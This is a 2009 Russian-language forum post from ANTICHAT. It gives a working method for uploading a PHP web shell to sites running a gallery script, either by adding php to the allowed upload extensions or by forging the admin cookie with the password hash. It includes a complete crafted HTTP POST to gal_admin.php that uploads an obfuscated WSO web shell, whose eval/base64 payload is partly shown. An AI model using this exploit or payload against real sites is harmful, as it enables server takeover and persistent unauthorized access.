HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #3  
Старый 24.11.2009, 00:04
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

наткнулся на эти скрипты а их до меня уже копали.. нашёл тоже самое.. такой облом.

====================
заливка шелла

1. пароль расшифровался.
идём в админку adm_gallery.php
редактируем Допустимые расширения и вписываем php через запятушку. заливаем шелл в месте загрузки картинок.
2. пароль не расшифровался.
посмотрев, исходники формируем сразу POST-запрос для заливки. По умолчанию php не фильтруется(!!!)
в куках ставим gal_admin_get_pass=<хеш пароля>

POST-запрос (весь код шелла wso не вместился)
Код:
POST /gal_admin.php HTTP/1.1
Host: site.ru
Keep-Alive: 30
Proxy-Connection: keep-alive
Cookie: gal_admin_get_pass=b01502fd0c860bdd35c5c9289de412db
Content-Type: multipart/form-data; boundary=---------------------------11538186919912
Content-Length: 23969

-----------------------------11538186919912
Content-Disposition: form-data; name="upload_cat"

1
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_name"

123
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_text"

234
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_big_file"; filename="wso2.4.php"
Content-Type: application/force-download

<?php
$auth_pass = "пыщь";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31W
....
...тут код шелла)))
....
LkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>
-----------------------------11538186919912
Content-Disposition: form-data; name="com"

upload
-----------------------------11538186919912
Content-Disposition: form-data; name="gal_menu"

add
-----------------------------11538186919912--
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости. Обсуждения. 9 15.08.2009 15:08
[ Обзор: уязвимости cPanel ] Solide Snake Веб-уязвимости 11 22.11.2008 18:41
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ